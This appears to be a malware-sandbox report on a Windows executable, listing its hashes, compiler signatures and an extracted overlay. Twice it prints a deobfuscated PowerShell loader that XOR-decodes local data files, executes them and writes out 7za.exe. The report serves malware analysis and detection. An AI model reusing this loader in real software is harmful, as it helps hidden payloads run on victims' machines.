e1af0acbebcaa1ceaaea9829c144954f

PE Executable
|
MD5: e1af0acbebcaa1ceaaea9829c144954f
|
Size: 5.32 MB
|
application/x-dosexec

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	e1af0acbebcaa1ceaaea9829c144954f
Sha1	6cc78e66e44a28b1b6bb7e77eec22066c545cd2f
Sha256	518e83f226c9a0ab4bfd27b3561331da201041c1c88c38e17b0dcdb4c8a7b742
Sha384	911dacb8d2a817cb272e8c42e7cbabf2caf7574a1334e39fbee39b0a9cae0b50cedaff38b7c9313273c2e6db486602c9
Sha512	f07fd208d7caccbf80fd645bd0bac8417946d15f768acc95637e7573d67cb4354fc595b8136b8a57a71078557f8ed32764623127e572fd072e725806919973ee
SSDeep	98304:mgwR1votgthvz1t+8VbgzDdIsAAhOGricuXC16hRDecL7Td9nN1Z36ViB:mgSu+httOzDusAieM8Z1l3qVO
TLSH	11363390B7825CB0FB9872706AB5A97F5EADB6E407D017DB731C0D1906111E08BFA2ED

PeID

Microsoft Visual C++

Microsoft Visual C++ 5.0

Microsoft Visual C++ 6.0 DLL (Debug)

Microsoft Visual C++ v6.0

Microsoft Visual C++ v6.0 DLL

File Structure

Informations

Name0	Value
Info	PE Detect: PeReader OK (file layout)
Info	Overlay extracted: Overlay_f8553289.bin (5174736 bytes)

Artefacts

Name0	Value
Deobfuscated PowerShell	@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data \| ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 12772 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 12772 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) Start-Sleep -Seconds 3 } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 12772 [File]::"WriteAllBytes"("7za.exe", $encodedData)

Name0

Value

Deobfuscated PowerShell

e1af0acbebcaa1ceaaea9829c144954f (5.32 MB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
Deobfuscated PowerShell	@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data \| ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 12772 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 12772 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) Start-Sleep -Seconds 3 } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 12772 [File]::"WriteAllBytes"("7za.exe", $encodedData) Malicious	e1af0acbebcaa1ceaaea9829c144954f > 7z-stream @ 0x000224A1.7z > setup.cmd

You must be signed in to post a comment.